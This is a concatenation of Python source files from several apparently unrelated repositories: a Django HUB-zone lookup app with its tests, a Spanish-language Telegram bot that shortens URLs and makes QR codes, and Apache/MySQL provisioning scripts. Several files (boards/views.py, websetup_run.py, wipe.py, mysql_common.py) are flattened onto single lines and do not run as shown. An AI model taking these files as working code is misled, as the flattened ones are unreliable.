    county name, previous/current year designation flags and reasons for
    the county, and previous/current year flags for the tract.
    """
    conn = psycopg2.connect(database="hub_designations", user="hub",
                            password="<PASSWORD>", host="127.0.0.1",
                            port="5432")
    cur = conn.cursor()

    # Same shape as the dictionary in getInHub.py.
    info = {
        'county': {
            'name': "",
            'prevYearDes': False,
            'currYearDes': False,
            'prevYearReason': "",
            'currYearReason': ""},
        'tract': {
            'prevYearDes': False,
            'currYearDes': False}
    }

    def _fetch_one(query, code):
        """Run a single-value SELECT with a bound parameter.

        SECURITY FIX: the original quoted the codes by hand and
        concatenated them into the SQL string; psycopg2 placeholders
        handle quoting/escaping safely.
        """
        cur.execute(query, (code,))
        return cur.fetchall()[0][0]

    info['county']['name'] = _fetch_one(
        "select county_name FROM county_designations WHERE county_code = %s", countyCode)
    cPrev = _fetch_one(
        "select july_2017_status FROM county_designations WHERE county_code = %s", countyCode)
    cCurr = _fetch_one(
        "select january_2018_status FROM county_designations WHERE county_code = %s", countyCode)
    tPrev = _fetch_one(
        "select january_2017_status FROM tract_designations WHERE tract_code = %s", tractCode)
    tCurr = _fetch_one(
        "select january_2018_status FROM tract_designations WHERE tract_code = %s", tractCode)

    # County status strings take three forms: "Not Qualified",
    # "Qualified by ..." and "Redesignated until ...".  Record the reason
    # for Qualified/Redesignated; mark designated only when Qualified.
    if "Not" not in cPrev:
        info['county']['prevYearReason'] = cPrev
        if 'Qualified' in cPrev:
            info['county']['prevYearDes'] = True
    if "Not" not in cCurr:
        info['county']['currYearReason'] = cCurr
        if 'Qualified' in cCurr:
            info['county']['currYearDes'] = True

    # Tract designations: flag only "Qualified" (not "Not Qualified").
    if 'Qualified' in tPrev and "Not" not in tPrev:
        info['tract']['prevYearDes'] = True
    if 'Qualified' in tCurr and "Not" not in tCurr:
        info['tract']['currYearDes'] = True

    # Read-only queries: no commit needed.
    conn.close()
    return info
B-Rad80/code-components
hubQuery/views.py
from django.shortcuts import render
from django.shortcuts import render_to_response
from django.http import HttpResponseRedirect
from .forms import queryForm, massForm, FileForm
from django.conf import settings
from django.core.files.storage import FileSystemStorage
import getInHub
import FileDumpParser
import os


# Create your views here.
def hubQuery(request):
    """Single-address HUB-zone lookup.

    POST with a valid form geocodes the address and renders the result;
    anything else renders the blank query page.
    """
    if request.method == 'POST':
        form = queryForm(request.POST)
        if form.is_valid():
            addr_in = form.cleaned_data['addr_in']
            loc = getInHub.location(addr_in)
            return render(request, 'app/queryResponse.html',
                          {'reqSuccess': True, 'loc': loc})
        return render(request, 'app/queryResponse.html')
    return render(request, 'app/queryResponse.html')


def massQuery(request):
    """Two-address proof-of-concept lookup.

    To implement a real mass drop, replace the form and this processing
    (forms.py, massResponse.html, here) with a list of [address, name]
    pairs like the one built below.
    """
    if request.method == 'POST':
        form = massForm(request.POST)
        if form.is_valid():
            addresses = [
                [form.cleaned_data['addr_in'], form.cleaned_data['name_in']],
                [form.cleaned_data['addr_in2'], form.cleaned_data['name_in2']],
            ]
            locList = []
            for address in addresses:
                loc = getInHub.location(address[0])
                loc.setName(address[1])
                locList.append(loc)
            return render(request, 'app/massResponse.html',
                          {'reqSuccess': True, 'locList': locList})
        # BUG FIX: an invalid POSTed form previously fell through and
        # returned None, which Django reports as a 500.
        return render(request, 'app/massResponse.html')
    return render(request, 'app/massResponse.html')


def fileQuery(request):
    """Bulk lookup from an uploaded file (CSV, docx, optionally zipped).

    Dispatches on the declared data_type/data_zip, extracts
    [id, address] pairs with FileDumpParser, geocodes each address and
    renders the results plus the rows that had no address.
    """
    if request.method == 'POST':
        form = FileForm(request.POST, request.FILES)
        if form.is_valid():
            print("form is valid!")
            data = form.cleaned_data['data']
            print(data.name)
            print(data.size)
            data_type = form.cleaned_data['data_type']
            data_zip = form.cleaned_data['data_zip']
            export = form.cleaned_data['export']
            print(data, data_type, data_zip, export)

            addresses = []
            parse_boi = FileDumpParser.FileDumpParser(False)
            if data_type == "1":
                print("type = CSV")
                if data_zip == "1":
                    print('Its Zipped!')
                else:
                    print('Not Zipped')
                print('parsing')
                addresses = parse_boi.parseCSV(data)
            elif data_type == "2":
                print("type == Docx")
                if data_zip == "1":
                    print('Its Zipped!')
                    tmp = parse_boi.unzip(data)
                    addresses = parse_boi.Text_to_String(tmp)
                else:
                    print('Not Zipped')
            elif data_type == "3":
                # TODO: automatic type detection not implemented yet.
                print("Fuck, I Havent implemented this yet")
                if data_zip == "1":
                    print('Its Zipped!')
                else:
                    print('Not Zipped')
            if export == "1":
                # TODO: export not implemented yet.
                print("no export yet fam")
            else:
                print("cool bc I have yet to do this")

            locList = []
            if addresses != []:
                for address in addresses[0]:
                    print(address[0])
                    print(address[1], "\n\n")
                    loc = getInHub.location(address[1])
                    loc.setName(address[0])
                    locList.append(loc)
                return render(request, 'app/fileDropResponse.html',
                              {'reqSuccess': True, 'locList': locList,
                               'noaddr': addresses[1]})
            return render(request, 'app/fileDropResponse.html',
                          {'invalid': True})
        return render(request, 'app/fileDropResponse.html',
                      {'invalid': True})
    return render(request, 'app/fileDropResponse.html')
B-Rad80/code-components
hubQuery/apps.py
from django.apps import AppConfig


class hubQueryConfig(AppConfig):
    """Django app configuration for the hubQuery app."""
    # Must match the app's package name as listed in INSTALLED_APPS.
    name = 'hubQuery'
B-Rad80/code-components
hubQuery/forms.py
from django import forms


class queryForm(forms.Form):
    """Single-address lookup form."""
    addr_in = forms.CharField(label='addr in', max_length=100)


class massForm(forms.Form):
    """Two-address proof-of-concept form (see views.massQuery)."""
    addr_in = forms.CharField(label='addr in', max_length=100)
    addr_in2 = forms.CharField(label='addr in', max_length=100)
    name_in = forms.CharField(label='addr in', max_length=100)
    name_in2 = forms.CharField(label='addr in', max_length=100)


class FileForm(forms.Form):
    """Bulk file-drop form; choice VALUES ("1"/"2"/"3") are what
    views.fileQuery dispatches on, so only labels may change."""
    YoN_CHOICES = (
        (1, ("yes")),
        (2, ("no")),
    )
    TYPE_CHOICES = (
        (1, ("CSV")),  # BUG FIX: label was misspelled "CVS"
        (2, ("Docx")),
        (3, ("Automatic")),
    )
    data = forms.FileField()
    data_type = forms.ChoiceField(choices=TYPE_CHOICES)
    data_zip = forms.ChoiceField(choices=YoN_CHOICES)
    export = forms.ChoiceField(choices=YoN_CHOICES)
B-Rad80/code-components
polls/urls.py
"""urls.py """
from django.urls import path
from . import views

# Routes for the polls app; the empty pattern maps to the index view.
urlpatterns = [
    path('', views.index, name='index'),
]
B-Rad80/code-components
mysite/urls.py
"""mysite URL Configuration

The `urlpatterns` list routes URLs to views. For more information please see:
    https://docs.djangoproject.com/en/2.1/topics/http/urls/
Examples:
Function views
    1. Add an import: from my_app import views
    2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
    1. Add an import: from other_app.views import Home
    2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
    1. Import the include() function: from django.urls import include, path
    2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.conf.urls import url
from django.contrib import admin
from django.urls import include, path
from django.views.generic import TemplateView
from accounts import views as accounts_views
from boards import views
from hubQuery import views as hubQuery_views

# Project-level routes: home/about pages, auth pages, the polls app and
# the three hub-query endpoints.
urlpatterns = [
    url(r'^$', views.home, name='home'),
    url(r'^aboutUs/$', views.aboutUs, name='aboutUs'),
    #url(r'^$', TemplateView.as_view(template_name='menu.html')),
    url(r'^signup/$', accounts_views.signup, name='signup'),
    url(r'^signin/$', accounts_views.signin, name='signin'),
    path('polls/', include('polls.urls')),
    url(r'^hubQuery/$', hubQuery_views.hubQuery, name='hubQuery'),
    url(r'^massQuery/$', hubQuery_views.massQuery, name='massQuery'),
    url(r'^fileQuery/$', hubQuery_views.fileQuery, name='fileQuery'),
    path('admin/', admin.site.urls),
]
B-Rad80/code-components
boards/views.py
from django.shortcuts import render # Create your views here. from django.shortcuts import render_to_response def home(request): return render_to_response('app/menu.html') def aboutUs(request): return render_to_response('app/about.html')
B-Rad80/code-components
getInHub_test.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
getInHub.py testing file
"""

import unittest
import getInHub
import requests
import simplejson as json
import designation


class TextprocTestCase(unittest.TestCase):
    """Unit tests for getInHub's geocoding helpers and location class.

    NOTE(review): test_getCT and test_getCoord hit live Google Maps /
    Census APIs, so they depend on network access and stable upstream
    data -- confirm before running in CI.
    """

    @classmethod
    def setUpClass(cls):
        pass

    @classmethod
    def tearDownClass(cls):
        pass

    def setUp(self):
        pass

    def tearDown(self):
        pass

    def test_init(self):
        # location() must reject non-string input with ValueError.
        Brandon = int(5)
        Maxine = "805 29th Street Boulder, CO"
        #q = getInHub.location()
        #print(getInHub.location(Brandon).addressString, "is the addressString")
        self.assertRaises(ValueError, getInHub.location, Brandon)
        # self.assertEqual(getInHub.location(Brandon), Brandon, "'text' does not match input")
        # self.assertEqual(getInHub.location(Maxine), Maxine, "'text' does not match input")

    def test_constructor(self):
        # NOTE(review): `testproc` is never imported in this file, so the
        # lambda raises NameError -- which assertRaises(Exception, ...)
        # accepts, making this test pass vacuously.  Confirm intent.
        a = 1
        b = ["cow", "dog"]
        self.assertRaises(Exception, lambda: testproc.Processor(a, b))

    def test_getCT(self):
        # Brandon case
        CTtest1 = {'error': False, 'errorText': "", 'tract': '08013012607', 'county': '08013'}
        # Maxine case
        CTtest2 = {'error': False, 'errorText': "", 'tract': '26049011714', 'county': '26049'}
        test_CT1 = getInHub.getCT('40.002550', '-105.256470')
        test_CT2 = getInHub.getCT('43.039140', '-83.542910')
        self.assertDictEqual(test_CT1, CTtest1, "Brandon test case failed")
        self.assertDictEqual(test_CT2, CTtest2, "Maxine test case failed")
        #self.addTypeEqualityFunc(typeobj, function)

    def test_getCoord(self):
        TestDict1 = {
            'error': False,
            'errorText': "",
            'lat': 40.0023989,
            'lng': -105.256342,
            'faddr': '805 29th St, Boulder, CO 80303, USA',
            'country': 'US'}
        Ctest1 = getInHub.getCoord("805 29th Street Boulder, CO")
        self.assertDictEqual(TestDict1, Ctest1, "Dicts where not the same")
        #self.assertEqual(x.count(), y, "count() function failed")

    '''
    def test_count_alpha(self):
        x = textproc.Processor('HiPPOpotaMUS')
        y = len('HiPPOpotaMUS')
        self.assertEqual(x.count_alpha(), y, "count_alpha() function failed")
        #assert x.count_alpha() == y
    def test_count_numeric(self):
        m = textproc.Processor('00987654321')
        n = len('00987654321')
        self.assertEqual(m.count_numeric(), n, "count_numeric() function failed")
        #assert x.count_numberic() == y
    def test_count_vowels(self):
        p = textproc.Processor('aeiouAEIOU')
        q = len('aeiouAEIOU')
        self.assertEqual(p.count_vowels(), q, "count_vowels() function failed")
    def test_is_phonenumber(self):
        test_phone_numbers = ['970-226-5150', '303.735.5880']
        for number in test_phone_numbers:
            p = textproc.Processor(number)
            self.assertTrue(p.is_phonenumber(), "is_phonenumber() function failed")
        #more fun with list comprehensions - filtering on the fly:
        #a = [1,2,3,5]
        #[i for i in a if i*i > 4]
        #[3, 5]
        #
        #for number in test_phone_numbers:
        #    list_textprocs = [textproc.Processor(number) for number in test_phone_numbers]
        #    [self.assertTrue(p.is_phonenumber(), "is_phonenumber() function failed") for p in list_textprocs]
    # Add Your Test Cases Here...
    '''
    #test_getCT(self)


# Main: Run Test Cases
if __name__ == '__main__':
    unittest.main()
GH0STsama/GhostNoobBot
noob.py
from telethon import TelegramClient, Button
from telethon.events import NewMessage
from telethon.tl.custom import Message
from pyshorteners import Shortener
from os import getenv, path, makedirs
from qrcode import make
from yarl import URL

try:
    # Local development credentials; fall back to env vars in production.
    from secure import *
except Exception:
    # BUG FIX: narrowed from a bare `except:` (which also swallowed
    # KeyboardInterrupt/SystemExit).
    API_ID = int(getenv("API_ID"))
    API_HASH = getenv("API_HASH")
    BOT_TOKEN = getenv("NOOB_BOT_TOKEN")

bot = TelegramClient("noob_bot", API_ID, API_HASH).start(bot_token=BOT_TOKEN)

# Per-user conversation state: user_id -> pending command constant.
conversation_state = {}


async def invalid_characters(fname: str) -> str:
    """Strip characters that are invalid in file names; quotes become
    apostrophes and '|' becomes a space."""
    for bad in ("<", ":", ">", "/", "?", "*"):
        fname = fname.replace(bad, "")
    fname = fname.replace('"', "'")
    fname = fname.replace("|", " ")
    return fname


async def generate_qr(text: str, user_id: int):
    """Render *text* as a QR image under ./<user_id>/ and send it."""
    user_path = "./" + str(user_id)
    if not path.exists(user_path):
        makedirs(user_path)
    qr_path = "./{0}/{1}.jpg".format(str(user_id), await invalid_characters(text))
    img = make(text)
    img.save(qr_path)
    await bot.send_file(user_id, qr_path,
                        caption=text + "\n\nQR generado por @GhostNoobBot 👻")


async def short_url(url: str) -> str:
    """Shorten *url* with every supported service and return the
    formatted result lines; services that fail are skipped.

    BUG FIX: the original reassigned ``url`` after every successful
    call, so each service shortened the PREVIOUS service's output
    instead of the original link.
    """
    original = url
    results = []

    def attempt(label, short_fn):
        # Best-effort: any provider error just drops that provider.
        try:
            results.append(f"\n**{label} :-** {short_fn(original)}")
        except Exception:
            pass

    s = Shortener()
    attempt("Chilp.it", s.chilpit.short)
    attempt("Clck.ru", s.clckru.short)
    attempt("Da.gd", s.dagd.short)
    attempt("Git.io", s.gitio.short)
    attempt("Is.gd", s.isgd.short)
    attempt("Osdb.link", s.osdb.short)
    attempt("Qps.ru", s.qpsru.short)
    attempt("TinyURL.com", s.tinyurl.short)
    attempt("0x0.st", Shortener(domain='https://0x0.st').nullpointer.short)
    attempt("ttm.sh", Shortener(domain='https://ttm.sh').nullpointer.short)
    return "".join(results)


async def short_process(url: str, event: Message):
    """Validate *url*, shorten it and reply with the result card."""
    if URL(url).scheme and URL(url).host:
        msg: Message = await event.reply("Por favor espere..")
        try:
            shorten = await short_url(url)
            await msg.delete()
        except Exception:
            await event.reply("❌ Ocurrio un error inesperado.")
            return
    else:
        await event.reply("❌ Ingrese una URL válida.")
        return
    message_caption = ("🤖 Ghost Noob Bot:\nAqui esta su enlace acortado multiples "
                       "acortadores, elija a su preferencia! 👍\n{0}\n\n"
                       "Enlace acortado por @GhostNoobBot")
    await bot.send_file(event.sender_id, "./noob.jpg",
                        caption=message_caption.format(shorten))


@bot.on(NewMessage())
async def message_handler(event: Message):
    """Route /start, /short and /qr, tracking two-step conversations in
    conversation_state."""
    user_id = event.sender_id
    state = conversation_state.get(user_id)

    if event.raw_text.lower() == "/start":
        await bot.send_file(
            user_id, "./noob.jpg",
            caption="<b>GhostNoobBot:</b>\n\n"
                    f'Hola <a href="tg://user?id={event.sender_id}">{event.sender.first_name}</a>, '
                    'soy un bot capaz de acortar enlaces y generar codigos QR a partir de texto, '
                    'puedo ayudar en algo?\n\n/qr - Generar codigo QR a partir de un texto\n'
                    '/short - Acortar un enlace',
            parse_mode="html",
            buttons=[
                [Button.url("👻 Canal", "https://t.me/GhostOpenSource"),
                 Button.url("💳 Donar", "https://qvapay.com/payme/ghostsama")],
                [Button.url("👾 GitHub", "https://github.com/GH0STsama/GhostNoobBot")]])
        return

    SHORT_LINK = 0
    if state is None and event.raw_text.startswith("/short"):
        if event.raw_text == "/short":
            # No argument: ask for the link and wait for the next message.
            await event.reply("🔗 Deme un enlace para acortar.")
            conversation_state[user_id] = SHORT_LINK
        else:
            url = event.raw_text[6:]
            if url.startswith(" "):
                url = url[1:]
            await short_process(url, event)
        return
    if state == SHORT_LINK:
        del conversation_state[user_id]
        await short_process(event.raw_text, event)
        return

    QR_CODE = 1
    if state is None and event.text.startswith("/qr"):
        if event.raw_text == "/qr":
            # No argument: ask for the text and wait for the next message.
            await event.reply("✏️ Enviame un texto.")
            conversation_state[user_id] = QR_CODE
            return
        await generate_qr(event.raw_text[3:], event.sender_id)
    if state == QR_CODE:
        if event.text:
            await generate_qr(event.raw_text, event.sender_id)
        else:
            await event.reply("❌ Error al generar el codigo QR")
        del conversation_state[user_id]
        return


print("Noob Iniciado!")
bot.run_until_disconnected()
milos85vasic/Apache-Factory-Toolkit
main_proxy.py
import json
import getpass
import sys

from commands import *
from configuration import *
from system_configuration import *

# Generates Apache reverse-proxy virtual-host configurations for every service
# bound to the given account, then restarts each affected Apache instance.
#
# Usage: python main_proxy.py [account]
# Defaults to the current OS user when no account argument is supplied.

account = getpass.getuser()
if len(sys.argv) >= 2:  # len() instead of the non-idiomatic sys.argv.__len__()
    account = sys.argv[1]
    print("Account passed as parameter: " + account)

system_configuration = get_system_configuration()
# Accounts whose Apache instance must be restarted after (re)writing vhosts.
scheduled_for_restart = []

if account in system_configuration:
    account_configuration = system_configuration[account]
    # NOTE(review): the double key_services lookup mirrors the nested schema
    # produced by get_system_configuration() -- confirm against that module.
    if key_services in account_configuration and key_services in account_configuration[key_services]:
        for service in account_configuration[key_services][key_services]:
            # Only services explicitly bound to a main-proxy account are handled.
            if key_configuration_main_proxy not in service:
                continue
            bind_to_account = service[key_configuration_main_proxy]
            scheduled_for_restart.append(bind_to_account)
            destination_directory = (
                get_home_directory_path(bind_to_account) + "/" + apache2 + "/" + apache_vhosts_directory
            )
            url = service[key_services_url]
            urls = [url]
            if key_services_urls in service:
                urls.extend(service[key_services_urls])
            if key_service_root in service:
                # The primary URL names the vhost file; additional URLs each get
                # their own <VirtualHost> entry inside it.
                destination_file = destination_directory + "/" + url + ".conf"
                if not os.path.isfile(destination_file):
                    try:
                        with open(destination_file, 'w') as outfile:
                            # Loop-invariant: the backend port is per-account.
                            port = str(account_configuration[key_configuration_port])
                            # server_name (not url) avoids shadowing the outer
                            # url used to build destination_file above.
                            for server_name in urls:
                                outfile.write("\n")
                                outfile.write("<VirtualHost *:80>")
                                outfile.write("\n")
                                outfile.write("\tProxyPreserveHost On")
                                outfile.write("\n")
                                outfile.write("\tProxyPass / http://127.0.0.1:" + port + "/")
                                outfile.write("\n")
                                outfile.write("\tProxyPassReverse / http://127.0.0.1:" + port + "/")
                                outfile.write("\n")
                                outfile.write("\tServerName " + server_name)
                                outfile.write("\n")
                                outfile.write("</VirtualHost>")
                                outfile.write("\n")
                    except IOError:
                        print("Can't access [2]: " + destination_file)
                else:
                    print("Virtual host configuration already exist: " + destination_file)
            else:
                print("No root for: " + url)
else:
    print("No account '" + account + "' in system configuration.")

# Restart every Apache instance whose vhost set may have changed.
for scheduled in scheduled_for_restart:
    steps = [
        run_as_su(
            get_home_directory_path(scheduled) + "/" + apache2 + "/bin/apachectl restart"
        )
    ]
    run(steps)
milos85vasic/Apache-Factory-Toolkit
websetup_run.py
<reponame>milos85vasic/Apache-Factory-Toolkit import sys from commands import * from configuration import * branch = "master" if __name__ == '__main__': what = sys.argv[1] if len(sys.argv) >= 3: branch = sys.argv[2] if what == apache_factory: print("Apache server factory application recognized.") steps = [ run_as_su( concatenate( cd("/root"), mkdir(apache_factory), cd(apache_factory), git_clone_to_recursive_submodules("https://github.com/milos85vasic/Apache-Factory.git"), git_checkout(branch) ) ) ] run(steps) exit() if what == pyramid_factory: print("Pyramid factory application recognized.") steps = [ run_as_su( concatenate( cd("/root"), mkdir(pyramid_factory), cd(pyramid_factory), git_clone_to_recursive_submodules("https://github.com/milos85vasic/Pyramid-Factory.git"), git_checkout(branch) ) ) ] run(steps) exit() if what == mail_server_factory: print("Mail server factory application recognized.") steps = [ run_as_su( concatenate( cd("/root"), mkdir(mail_server_factory), cd(mail_server_factory), git_clone_to_recursive_submodules("https://github.com/milos85vasic/Mail-Server-Factory"), git_checkout(branch) ) ) ] run(steps) exit() print("Not recognized: " + what) exit(1)
milos85vasic/Apache-Factory-Toolkit
wipe.py
import os import sys source_file = "" destination_file = "" replacements = [] for arg in sys.argv: index = sys.argv.index(arg) if index == 1: source_file = arg if index == 2: destination_file = arg if index >= 3: replacements.append(arg) if os.path.isfile(source_file): print("Wiping:") print("From: " + source_file) print("Into: " + destination_file) replace_what = [] replace_with = [] for x in range(0, replacements.__len__()): if x % 2 == 0: replace_what.append(replacements[x]) else: replace_with.append(replacements[x]) with open(source_file, "rt") as fin: with open(destination_file, "wt") as fout: for line in fin: replaced = line for x in range(0, replacements.__len__() / 2): replaced = replaced.replace(replace_what[x], replace_with[x]) fout.write(replaced) print("-----")
milos85vasic/Apache-Factory-Toolkit
mysql_common.py
import sys from .commands import * from .mysql_common_5560 import * mysql_init_tmp = "init.tmp" def get_account_from_sys_argv(): return sys.argv[1] def user_home(): return get_home_directory_path(get_account_from_sys_argv()) def get_mysql_bin_directory(): # MySQL 8.0: # return user_home() + "/" + mysql + "/" + mysql_installation_dir + "/usr/local/mysql/bin" # MySQL 5.5.60: return user_home() + "/" + mysql + "/" + mysql_bin_dir def get_mysql_logs_directory(): return user_home() + "/" + mysql + "/" + mysql_log_dir def get_start_command(account_home): return "/mysqld --defaults-extra-file=" + account_home + "/" + mysql + "/" + mysql_conf_dir + "/my.cnf &" def get_start_command_init(account_home): return "/mysqld --defaults-extra-file=" + account_home + "/" + mysql + "/" + mysql_conf_dir \ + "/my.cnf --init-file=" + account_home + "/" + apache_factory + "/" + mysql_init_tmp + " &" # MySQL 8.0: def initialize_mysql_8(): return "/mysqld --defaults-file=" + user_home() + "/" + mysql + "/" + mysql_conf_dir + \ "/my.cnf --initialize --user=" + get_account_from_sys_argv()